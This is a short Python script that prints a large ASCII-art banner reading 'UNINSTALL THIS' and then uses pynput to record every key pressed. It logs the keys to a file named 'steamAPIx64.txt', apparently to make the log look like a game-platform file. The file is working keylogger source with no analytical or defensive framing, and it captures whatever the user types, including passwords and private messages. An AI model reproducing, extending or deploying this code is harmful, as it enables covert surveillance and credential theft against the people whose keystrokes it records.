from pynput.keyboard import Key,Listener
import logging
print("██╗░░░██╗███╗░░██╗██╗███╗░░██╗░██████╗████████╗░█████╗░██╗░░░░░██╗░░░░░  ████████╗██╗░░██╗██╗░██████╗")
print("██║░░░██║████╗░██║██║████╗░██║██╔════╝╚══██╔══╝██╔══██╗██║░░░░░██║░░░░░  ╚══██╔══╝██║░░██║██║██╔════╝")
print("██║░░░██║██╔██╗██║██║██╔██╗██║╚█████╗░░░░██║░░░███████║██║░░░░░██║░░░░░  ░░░██║░░░███████║██║╚█████╗░")
print("██║░░░██║██║╚████║██║██║╚████║░╚═══██╗░░░██║░░░██╔══██║██║░░░░░██║░░░░░  ░░░██║░░░██╔══██║██║░╚═══██╗")
print("╚██████╔╝██║░╚███║██║██║░╚███║██████╔╝░░░██║░░░██║░░██║███████╗███████╗  ░░░██║░░░██║░░██║██║██████╔╝")
print("░╚═════╝░╚═╝░░╚══╝╚═╝╚═╝░░╚══╝╚═════╝░░░░╚═╝░░░╚═╝░░╚═╝╚══════╝╚══════╝  ░░░╚═╝░░░╚═╝░░╚═╝╚═╝╚═════╝░")
logdir = ""

logging.basicConfig(filename=(logdir + "steamAPIx64.txt"), level=logging.DEBUG, format='')
def on_press(key):
    logging.info(key)
with Listener(on_press=on_press) as Listener:
    Listener.join()